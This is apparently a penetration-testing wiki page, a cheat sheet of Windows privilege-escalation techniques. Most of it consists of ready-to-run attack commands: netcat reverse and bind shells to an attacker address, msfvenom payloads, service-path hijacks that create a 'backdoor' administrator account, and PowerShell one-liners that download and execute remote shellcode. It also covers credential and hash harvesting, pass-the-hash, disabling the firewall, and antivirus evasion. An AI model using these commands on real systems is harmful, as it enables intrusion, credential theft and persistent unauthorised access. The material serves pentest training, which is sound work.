Windows

Windows Privilege Escalation Examples

1
https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/privilege-escalation/windows/windows-examples.rst
Copied!

MindMap

1
https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md
Copied!

Windows Kernel Sploit List

1
https://github.com/njahrckstr/Windows_Kernel_Sploit_List
Copied!

Videos

use rlwrap to improve windows shell
rlwrap nc -lnvp 443

Useful commands

1
http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
Copied!
1
https://github.com/emilyanncr/Windows-Post-Exploitation
Copied!

Credential reuse

1
https://recipeforroot.com/windows-password-scouting/
Copied!
Sometimes a user that you have the credentials for is also the administrator on the system, but uses the same password for both accounts. So never forget to try passwords when you have the chance. Just don't overdo it so you trigger some lockout mechanism and get detected.
Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group. As you can see from the output of the three commands below the username is hacker, he is part of the group administrators. In this case, a privilege escalation is not necessary because we are already in the administrators group!
    whoami
    net localgroup administrator
    net user "%username%"
Getting a shell in limited interpreters:
1
system("start cmd.exe /k $cmd")
Copied!
Bind cmd to a port:
1
nc.exe -Lp 31337 -vv -e cmd.exe
Copied!
Reverse shell:
1
nc.exe attacker_ip attacker_port -e cmd.exe
Copied!

To capture NTLM hash

1
https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/
Copied!
Spin up smbserver.py and connect via smb to your server on kali. ie smbclient -L //$kali$ip
1
/usr/share/doc/python-impacket/examples/smbserver.py -smb2support test .
2
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
3
​
4
[*] Config file parsed
5
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
6
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
7
[*] Config file parsed
8
[*] Config file parsed
9
[*] Config file parsed
10
[*] Incoming connection (victimip:port)
11
[*] AUTHENTICATE_MESSAGE (MicrosoftAccount\[email protected],DESKTOP-12345A)
12
[*] User [email protected]\DESKTOP-123456A authenticated successfully
13
[*][email protected]::MicrosoftAccount:aad3c435b514a4eeaad3b935b51304fec46b9e58:aad3c435b514a4eeaad3b935b51304fec46b9e58:aad3c435b514a4eeaad3b935b51304fec46b9e58
14
​
Copied!

System info

Finding installed software, running processes, bind ports, and OS version might be critical to identify the right EoP vector.
Find installed patches, architecture, OS version
1
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Copied!
Get exact OS version
1
type C:/Windows/system32/eula.txt
Copied!
Hotfix(s): N/A If there are no Hot fixes then its likely the system is vulnerable to kernel exploit

Hostname

Environment
1
set
Copied!
List open connections
1
netstat -aton
Copied!
Network information
1
ipconfig /all & route print & arp -a
Copied!

Information about a Users & Administrator

Find current user.
1
echo %username%
Copied!
1
getuid
Copied!

List all users

1
net users
Copied!

Firewall information

1
netsh firewall show state
2
netsh firewall show config
Copied!

List scheduled tasks

1
schtasks /query /fo LIST /v
Copied!

List windows services

1
net start
Copied!
1
wmic service list brief
Copied!
Links running processes to started services
1
tasklist /SVC
Copied!

Incorrect permissions in services

A service running as Administrator/SYSTEM with incorrect file permissions might allow PE. You can replace the binary, restart the service and get system.
We are interested in services where permissions are: BUILTIN\Users with (F) or (C) or (M) for our group. More info about permissions:
1
https://msdn.microsoft.com/en-us/library/bb727008.aspx
Copied!
Common exploitation payloads involve: Replacing the affecting binary with a reverse shell or a command that creates a new user and adds it to the Administrator group. Replace the affected service with your payload and and restart the service running:
1
wmic service NAMEOFSERVICE call startservice
2
net stop [service name] && net start [service name]
Copied!
1
sc start/stop serviceName
Copied!

Obtain the permission string of all services

1
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @sc sdshow %i & @echo ---------) & del a 2>nul & del b 2>nul
Copied!
The following commands will print the affected services:
1
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
2
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
Copied!
If wmic is not available we can use sc.exe:
1
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt
2
FOR /F %i in (Servicenames.txt) DO echo %i
3
type Servicenames.txt
4
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
5
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
Copied!
You can also manually check each service using cacls:
1
cacls "C:\path\to\file.exe"
Copied!
If you don't have access to wmic, you can do:
1
sc qc upnphost
Copied!
Windows XP SP1 is known to be vulnerable to PE in upnphost. You get Administrator with:
1
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe YOUR_IP 1234 -e C:\WINDOWS\System32\cmd.exe"
2
sc config upnphost obj= ".\LocalSystem" password= ""
3
sc qc upnphost
Copied!
If it fails because of a missing dependency, run the following:
1
sc config SSDPSRV start= auto
2
net start SSDPSRV
3
net start upnphost
Copied!
Or remove the dependency:
1
sc config upnphost depend= ""
Copied!
Using meterpreter:
1
exploit/windows/local/service_permissions
Copied!

acesschk.exe

If wmic and sc is not available, you can use accesschk. For Windows XP, version 5.2 of accesschk is needed:
1
https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
Copied!
1
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
2
accesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteula
3
accesschk.exe -qdws Users C:\Windows\
Copied!
Then query the service using Windows sc:
1
sc qc <vulnerable service name>
Copied!
Then change the binpath to execute your own commands (restart of the service will most likely be needed):
1
sc config <vuln-service> binpath= "net user backdoor backdoor123 /add"
2
sc stop <vuln-service>
3
sc start <vuln$ -service>
4
sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add"
5
sc stop <vuln-service>
6
sc start <vuln-service>
Copied!
Note - Might need to use the depend attribute explicitly:sc stop <vuln-service>
1
sc config <vuln-service> binPath= "c:\inetpub\wwwroot\runmsf.exe" depend= "" start= demand obj= ".\LocalSystem" password= ""
2
sc start <vuln-service>
Copied!

Juicy Potato (abusing the golden privileges)

If you have SeAssingPrimaryToken or SeImpersonate privileges, you can get SYSTEM.

Vulnerable Win versions

1
Windows 7 Enterprise
2
Windows 8.1 Enterprise
3
Windows 10 Enterprise
4
Windows 10 Professional
5
Windows Server 2008 R2 Enterprise
6
Windows Server 2012 Datacenter
7
Windows Server 2016 Standard
Copied!
create payload
1
msfvenom -p windows/shell_reverse_tcp LHOST=$kaliip LPORT=444 -e x86/shikata_ga_nai -f exe -o rev.exe
Copied!
run juicy potato
1
JuicyPotato.exe -l 1340 -p C:\users\User\rev.exe -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
Copied!
capture connection
1
rlwrap nc -lnvp 444
2
Ncat: Version 7.80 ( https://nmap.org/ncat )
3
Ncat: Listening on :::444
4
Ncat: Listening on 0.0.0.0:444
5
Ncat: Connection from $ip.
6
Ncat: Connection from $ip:54805.
7
Microsoft Windows [Version 10.0.17134.590]
8
(c) 2018 Microsoft Corporation. All rights reserved.
9
​
10
C:\Windows\system32>
Copied!

Find unquoted paths

If we find a service running as SYSTEM/Administrator with an unquoted path and spaces in the path we can hijack the path and use it to elevate privileges. This occurs because windows will try, for every white space, to find the binary in every intermediate folder.
For example, the following path would be vulnerable:
1
C:\Program Files\something\winamp.exe
Copied!
Not vulnerable
1
"C:\Program Files\something\winamp.exe"
Copied!
Obtain the path of the executable called by a Windows service (good for checking Unquoted Paths):
1
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul
Copied!
We could place our payload with any of the following paths:
1
C:\winamp.exe (this is a reverse shell with the same names as legal program)
Copied!

The following command will display affected services:

1
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
Copied!

Check Permissions

We might even be able to override the service executable, always check out the permissions of the service binary:
1
icacls "C:\Program Files (x86)\Program Folder"
Copied!
You can automate with meterpreter:
1
exploit/windows/local/trusted_service_path
Copied!

PowerUp

PowerUp is an extremely useful script for quickly checking for obvious paths to privilege escalation on Windows. It is not an exploit itself, but it can reveal vulnerabilities such as administrator password stored in registry and similar. We shamelessly use harmj0y's guide as reference point for the following guide. Some basic knowledge about how to import Powershell modules and used them is required.
PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations
Import the PowerUp module with the following:
PS C:\> Import-Module PowerUp.ps1

CanRestart

The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program!
Use msfvenom to generate a reverse shell as an Windows executable.
If you want to invoke everything without touching disk, use something like this:
C:\> powershell -nop -exec bypass -c β€œIEX (New-Object Net.WebClient).DownloadString(β€˜http://bit.ly/1mK64oH’); Invoke-AllChecks”

Finding stuff fast

ClearText passwords (quick hits)

findstr /s /C:"stringtosearchfor.txt" "C:*"
We might sometimes find passwords in arbitrary files, you can find them running:
1
findstr /si password *.txt
2
findstr /si password *.xml
3
findstr /si password *.ini
Copied!

Find all those strings in config files.

1
dir /s *pass* == *cred* == *vnc* == *.config*
Copied!

Find all passwords in all files.

1
findstr /spin "password" *.*
Copied!
1
findstr /spin "password" *.*
Copied!
These are common files to find them in. They might be base64-encoded. So look out for that.
1
type c:\sysprep.inf
2
type c:\sysprep\sysprep.xml
3
type c:\unattend.xml
4
type %WINDIR%\Panther\Unattend\Unattended.xml
5
type %WINDIR%\Panther\Unattended.xml
Copied!
1
dir c:*vnc.ini /s /b
2
dir c:*ultravnc.ini /s /b
3
dir c:\ /s /b | findstr /si *vnc.ini
Copied!

Stuff in the registry:

1
reg query HKLM /f password /t REG_SZ /s
2
reg query HKCU /f password /t REG_SZ /s
3
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
4
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
5
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
6
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
Copied!

Using meterpreter:

1
post/windows/gather/credentials/gpp
2
post/windows/gather/enum_unattend
Copied!

Pass the hash

Pass The Hash allows an attacker to authenticate to a remote target by using a valid combination of username and NTLM/LM hash rather than a cleartext password.
Windows hash format:
1
user:group:id:ntlmpassword::
Copied!
You can do a hash dump in the affected system running:
1
wce32.exe -w
2
wce64.exe -w
3
fgdump.exe
Copied!
Download and run fgdump.exe on the target machine.
1
cd /usr/share/windows-binaries/fgdump; python -m SimpleHTTPServer 80
Copied!
1
pth-winexe -U DOMAIN/user%hash //$ip cmd
Copied!
or:
1
export SMBHASH=xxx
2
pth-winexe -U user% //$ip cmd
Copied!
You can also do run as, with the hash:

Technique 1:

1
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
Copied!

Technique 2:

1
secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
2
mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
3
computer = "<hostname>"
4
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
Copied!
1
powershell -ExecutionPolicy Bypass -File c:\users\public\r.ps1
Copied!

Technique 3:

1
psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc <attacker_ip> 4444 -e cmd.exe"
Copied!

Services only available from loopback

You can find services bind to the loopback interface that are not reachable through the network running. Look for LISTENING/LISTEN:
1
netstat -ano
Copied!
Port forward using plinplink.exe -l root -pw mysecretpassword 192.168.0.101 -R 8080:127.0.0.1:8080
Port forward using meterpreter
1
portfwd add -l <attacker port> -p <victim port> -r <victim ip>
2
portfwd add -l 3306 -p 3306 -r 192.168.1.101
Copied!

If powershell is blocked, you can download:

1
https://github.com/Ben0xA/nps
Copied!
Once you know the updates installed, you can find known exploits using windows-exploit-suggester.
1
./windows-exploit-suggester.py -d 2017-02-09-mssb.xls -p ms16-075
2
[*] initiating winsploit version 3.2…
3
[*] database file detected as xls or xlsx based on extension
4
[*] searching all kb’s for bulletin id MS16-075
5
[+] relevant kbs [β€˜3164038’, β€˜3163018’, β€˜3163017’, β€˜3161561’]
6
[*] done
Copied!
In March 2017 Microsoft stopped maintaining the security bulletin search. This means the Windows Exploit Suggester database will not include any vulnerabilities or exploits found after that date. Still, this tool can still be very useful on older systems.

Compile windows exploit in linux:

1
i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe
Copied!

Compiling python scripts to executables:

1
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile 18176.py
Copied!

AlwaysInstallElevated

AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions.
Check if these 2 registry values are set to "1"reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
1
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Copied!
If they are, create your own malicious msi:
1
msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
Copied!
Then use msiexec on victim to execute your msi:
1
msiexec /quiet /qn /i C:\evil.msi
Copied!
Metasploit module:
1
use exploit/windows/local/always_install_elevated
Copied!

Windows-privesc-checker2

1
https://github.com/pentestmonkey/windows-privesc-check/archive/master.zip
Copied!

Vulnerable drivers

Third party drivers might contain vulnerabilities, find them running:
1
DRIVERQUERY
Copied!

Kernel vulnerabilities

Run exploit suggester against systeminfo:

Don't rely on this - there are a lot of false positive! This is generally a last resort.
1
https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
Copied!
1
python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt
Copied!

Find installed paths:

1
wmic qfe get Caption,Description,HotFixID,InstalledOn
Copied!

Comprehensive tables of vulnerabilities below:

1
[+] Windows vulnerabilities:
2
​
3
Windows XP:
4
CVE-2012-4349 Unquoted windows search path - Windows provides the capability of including spaces in path names - can be root
5
CVE-2011-1345 Internet Explorer does not properly handle objects in memory - allows remote execution of code via object
6
CVE-2010-3138 EXPLOIT-DB 14765 - Untrusted search path vulnerability - allows local users to gain privileges via a Trojan horse
7
CVE-2011-5046 EXPLOIT-DB 18275 - GDI in windows does not properly validate user-mode input - allows remote code execution
8
CVE-2002-1214 ms02_063_pptp_dos - exploits a kernel based overflow when sending abnormal PPTP Control Data packets - code execution, DoS
9
CVE-2003-0352 ms03_026_dcom - exploits a stack buffer overflow in the RPCSS service
10
CVE-2003-0533 MS04-011 - ms04_011_lsass - exploits a stack buffer overflow in the LSASS service
11
CVE-2003-0719 ms04_011_pct - exploits a buffer overflow in the Microsoft Windows SSL PCT protocol stack - Private communication target overflow
12
CVE-2010-3970 ms11_006_createsizeddibsection - exploits a stack-based buffer overflow in thumbnails within .MIC files - code execution
13
CVE-2010-3147 EXPLOIT-DB 14745 - Untrusted search path vulnerability in wab.exe - allows local users to gain privileges via a Trojan horse
14
CVE-2003-0812 ms03_049_netapi - exploits a stack buffer overflow in the NetApi32
15
CVE-2003-0818 ms04_007_killbill - vulnerability in the bit string decoding code in the Microsoft ASN.1 library
16
CVE-2003-0822 ms03_051_fp30reg_chunked - exploit for the chunked encoding buffer overflow described in MS03-051
17
CVE-2004-0206 ms04_031_netdde - exploits a stack buffer overflow in the NetDDE service
18
​
19
Windows 7:
20
CVE-2014-4114 ms14_060_sandworm - exploits a vulnerability found in Windows Object Linking and Embedding - arbitrary code execution
21
CVE-2015-0016 ms15_004_tswbproxy - abuses a process creation policy in Internet Explorer's sandbox - code execution
22
CVE-2014-4113 ms14_058_track_popup_menu - exploits a NULL Pointer Dereference in win32k.sys - arbitrary code execution
23
CVE-2010-3227 EXPLOIT-DB - Stack-based buffer overflow in the UpdateFrameTitleForDocument method - arbitrary code execution
24
CVE-2018-8494 remote code execution vulnerability exists when the Microsoft XML Core Services MSXML parser processes user input
25
CVE-2010-2744 EXPLOIT-DB 15894 - kernel-mode drivers in windows do not properly manage a window class - allows privileges escalation
26
CVE-2010-0017 ms10_006_negotiate_response_loop - exploits a denial of service flaw in the Microsoft Windows SMB client - DoS
27
CVE-2010-0232 ms10_015_kitrap0d - create a new session with SYSTEM privileges via the KiTrap0D exploit
28
CVE-2010-2550 ms10_054_queryfs_pool_overflow - exploits a denial of service flaw in the Microsoft Windows SMB service - DoS
29
CVE-2010-2568 ms10_046_shortcut_icon_dllloader - exploits a vulnerability in the handling of Windows Shortcut files (.LNK) - run a payload
30
​
31
Windows 8:
32
CVE-2013-0008 ms13_005_hwnd_broadcast - attacker can broadcast commands from lower Integrity Level process to a higher one - privilege escalation
33
CVE-2013-1300 ms13_053_schlamperei - kernel pool overflow in Win32k - local privilege escalation
34
CVE-2013-3660 ppr_flatten_rec - exploits EPATHOBJ::pprFlattenRec due to the usage of uninitialized data - allows memory corruption
35
CVE-2013-3918 ms13_090_cardspacesigninhelper - exploits CardSpaceClaimCollection class from the icardie.dll ActiveX control - code execution
36
CVE-2013-7331 ms14_052_xmldom - uses Microsoft XMLDOM object to enumerate a remote machine's filenames
37
CVE-2014-6324 ms14_068_kerberos_checksum - exploits the Microsoft Kerberos implementation - privilege escalation
38
CVE-2014-6332 ms14_064_ole_code_execution - exploits the Windows OLE Automation array vulnerability
39
CVE-2014-6352 ms14_064_packager_python - exploits Windows Object Linking and Embedding (OLE) - arbitrary code execution
40
CVE-2015-0002 ntapphelpcachecontrol - NtApphelpCacheControl Improper Authorization Check - privilege escalation
41
42
Windows 10:
43
CVE-2015-1769 MS15-085 - Vulnerability in Mount Manager - Could Allow Elevation of Privilege
44
CVE-2015-2426 ms15_078_atmfd_bof MS15-078 - exploits a pool based buffer overflow in the atmfd.dll driver
45
CVE-2015-2479 MS15-092 - Vulnerabilities in .NET Framework - Allows Elevation of Privilege
46
CVE-2015-2513 MS15-098 - Vulnerabilities in Windows Journal - Could Allow Remote Code Execution
47
CVE-2015-2423 MS15-088 - Unsafe Command Line Parameter Passing - Could Allow Information Disclosure
48
CVE-2015-2431 MS15-080 - Vulnerabilities in Microsoft Graphics Component - Could Allow Remote Code Execution
49
CVE-2015-2441 MS15-091 - Vulnerabilities exist when Microsoft Edge improperly accesses objects in memory - allows remote code execution
50
CVE-2015-0057 exploits GUI component of Windows namely the scrollbar element - allows complete control of a Windows machine
51
​
52
Windows Server 2003:
53
CVE-2008-4114 ms09_001_write - exploits a denial of service vulnerability in the SRV.SYS driver - DoS
54
CVE-2008-4250 ms08_067_netapi - exploits a parsing flaw in the path canonicalization code of NetAPI32.dll - bypassing NX
55
CVE-2017-8487 allows an attacker to execute code when a victim opens a specially crafted file - remote code execution
Copied!
1
https://github.com/SecWiki/windows-kernel-exploits
Copied!

Windows version map

1
Operating System Version Number
2
​
3
Windows 1.0 1.04
4
Windows 2.0 2.11
5
Windows 3.0 3
6
Windows NT 3.1 3.10.528
7
Windows for Workgroups 3.11 3.11
8
Windows NT Workstation 3.5 3.5.807
9
Windows NT Workstation 3.51 3.51.1057
10
Windows 95 4.0.950
11
Windows NT Workstation 4.0 4.0.1381
12
Windows 98 4.1.1998
13
Windows 98 Second Edition 4.1.2222
14
Windows Me 4.90.3000
15
Windows 2000 Professional 5.0.2195
16
Windows XP 5.1.2600
17
Windows Vista 6.0.6000
18
Windows 7 6.1.7600
19
Windows 8.1 6.3.9600
20
Windows 10 10.0.10240
Copied!

Automated tools

Powersploit

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment
1
https://github.com/PowerShellMafia/PowerSploit
2
Get-GPPPassword
3
Get-UnattendedInstallFile
4
Get-Webconfig
5
Get-ApplicationHost
6
Get-SiteListPassword
7
Get-CachedGPPPassword
8
Get-RegistryAutoLogon
Copied!

Reverse Shell from Windows

If there’s a way, we can execute code from windows, we may try
    Uploading ncat and executing it
    Powershell Empire/ Metasploit Web-Delivery Method
    Invoke-Shellcode (from powersploit) see below
1
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('http://YourIPAddress:8000/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost YourIPAddress -Lport 4444 -Force"
Copied!

Metasploit

1
post/windows/gather/credentials/gpp
2
post/windows/gather/enum_unattend
Copied!
1
getsystem
2
getprivs
3
use priv
4
hashdump
Copied!

Metasploit incognito

1
use incognito
2
list_tokens -u
3
list_tokens -g
4
impersonate_token DOMAIN_NAME\\USERNAME
5
steal_token PID
6
drop_token
7
rev2self
Copied!

Useful commands

Add a new user

1
net user test 1234 /add
2
net localgroup administrators test /add
Copied!
1
type file
Copied!

Remove file

1
del /f file
Copied!

Change password for user:

1
net user <user> <password>
Copied!

List users:

1
net user
Copied!

Info about a user:

1
net user <username>
Copied!

Permissions on a folder recursively:

1
cacls *.* /t /e /g domainname\administrator:f
Copied!

Enable RDP access

This is useful to do because generally it is easier to manipulate windows using the GUI. The downside is that you're most definitely will have an impact on the machine, as you may have to create a user or change a user's password to get in.
1
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
2
netsh firewall set service remoteadmin enable
3
netsh firewall set service remotedesktop enable
Copied!

Disable firewall

1
netsh firewall set opmode disable
Copied!

Run exploit

1
C:\tmp>powershell -ExecutionPolicy ByPass -command "& { . C:\tmp\Invoke-MS16-032.ps1; Invoke-MS16-032 }"
Copied!

JAWS

1
https://411hall.github.io/JAWS-Enumeration/
Copied!

Metasploit

Module to elevate privileges to SYSTEM by creating a service or hijacking existing ones with incorrect permissions
1
exploit/windows/local/service_permissions
Copied!

Other scripts

1
https://github.com/GDSSecurity/Windows-Exploit-Suggester
2
https://github.com/Jean13/Penetration_Testing/blob/master/Privilege_Escalation/windows-privesc-check2.exe
Copied!
​GDSSecurity's Windows-Exploit-Suggester worked excellently for operating systems in the Windows XP and Windows Vista era, GDSSecurity's Windows-Exploit-Suggester does not work for operating systems like Windows 10 and vulnerabilities published in recent years. This is because Microsoft replaced the Microsoft Security Bulletin Data Excel file [1] on which GDSSecurity's Windows-Exploit-Suggester is fully dependent, by the MSRC API [2]. The Microsoft Security Bulletin Data Excel file has not been updated since Q1 2017, so later operating systems and vulnerabilities cannot be detected. Thanks @gdssecurity, for this great tool which has served many of us for so many years!
1
https://github.com/bitsadmin/wesng.git
Copied!

Useful exploits

Automatically downloads and compiles exploit

1
wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py
Copied!
1
USAGE: xploit_installer.py <exploit id>
Copied!

Windows Remote Exploits:

1
0: windows_exploit_suggester
2
1: ms03-026
3
2: ms03-039 (1)
4
3: ms03-039 (2)
5
4: *ms03-049
6
5: ms04-007
7
6: ms04-011 - ssl bof
8
7: ms04-011 - lsasarv.dll
9
8: ms04-031
10
9: ms05-017
11
10: ms05-039
12
11: *ms06-040 (1)
13
12: ms06-040 (2)
14
13: ms06-070
15
14: *ms08-067 (1)
16
15: ms08-067 (2)
17
16: ms08-067 (3)
18
17: *ms09-050
Copied!

Windows Local Exploits:

1
18: windows-privesc-check
2
19: ms04-011
3
20: ms04-019 (1)
4
21: ms04-019 (2)
5
22: ms04-019 (3)
6
23: ms04-020
7
24: *keybd_event
8
25: *ms05-018
9
26: *ms05-055
10
27: ms06-030
11
28: ms06-049
12
29: print spool service
13
30: *ms08-025
14
31: netdde
15
32: ms10-015
16
33: ms10-059
17
34: ms10-092
18
35: ms11-080
19
36: ms14-040
20
37: *ms14-058 (1)
21
38: ms14-058 (2)
22
39: *ms14-070 (1)
23
40: ms14-070 (2)
24
41: *ms15-010 (1)
25
42: *ms15-010 (2)
26
43: ms15-051
27
44: *ms16-014
28
45: ms16-016
29
46: ms16-032
Copied!
Check out:
1
http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation
Copied!

Windows Server 2003 and IIS 6.0 privilege escalation using impersonation:

1
https://www.exploit-db.com/exploits/6705/
Copied!
1
https://github.com/Re4son/Churrasco
Copied!
1
c:\Inetpub>churrasco
2
churrasco
3
/churrasco/-->Usage: Churrasco.exe [-d] "command to run"
4
​
5
c:\Inetpub>churrasco -d "net user /add <username> <password>"
6
c:\Inetpub>churrasco -d "net localgroup administrators <username> /add"
Copied!

Windows MS11-080

http://www.exploit-db.com/exploits/18176/
1
python pyinstaller.py --onefile ms11-080.py
Copied!
1
mx11-080.exe -O XP
Copied!
From admin to system
1
psexec.exe -i -s %SystemRoot%\system32\cmd.exe
Copied!
1
https://github.com/Cn33liz/EasySystem
Copied!

AV bypass

Generating a mutated binary to bypass antiviruses
1
wine hyperion.exe ../backdoor.exe ../backdoor_mutation.exe
Copied!

Access Check

You will probably need to accept the eula first:
1
accesschk.exe /accepteula
Copied!

Windows hashes

if you capture a hash - put it into Google someone might have cracked it before
NTLM and LM passwords are located in the SAM file in C:\\Windows\SYSTEM32\CONFIG
LAN Manager (LM): Windows XP and prior use LAN manager protocol. Uses DES but the key space is small (only uppercase, not salted, 14 chars or padded to 14).
NTLM/NTLM2: It does not split the password, also stored in uppercase
Kerberos: Default protocol for active directory envs.PoCs
Add user to administrator group
1
#include <stdlib.h>
2
int main ()
3
{
4
int i;
5
i = system("net localgroup administrators theusername /add");
6
return 0;
7
}
Copied!
1
i686-w64-mingw32-gcc windows-exp.c -lws2_32 -o exp.exe
Copied!

Run an arbitrary command:

1
echo -e '#include <stdio.h>\n#include <smain () {\nsystem("C:\\Users\\Administrator\\Desktop\\nc -lvp 4313 -e cmd.exe");\nreturn(0);\n}'> poc.c
Copied!

Print proof

1
echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Documents and Settings\Administrator\Desktop\proof.txt"
Copied!
​
Last modified 5mo ago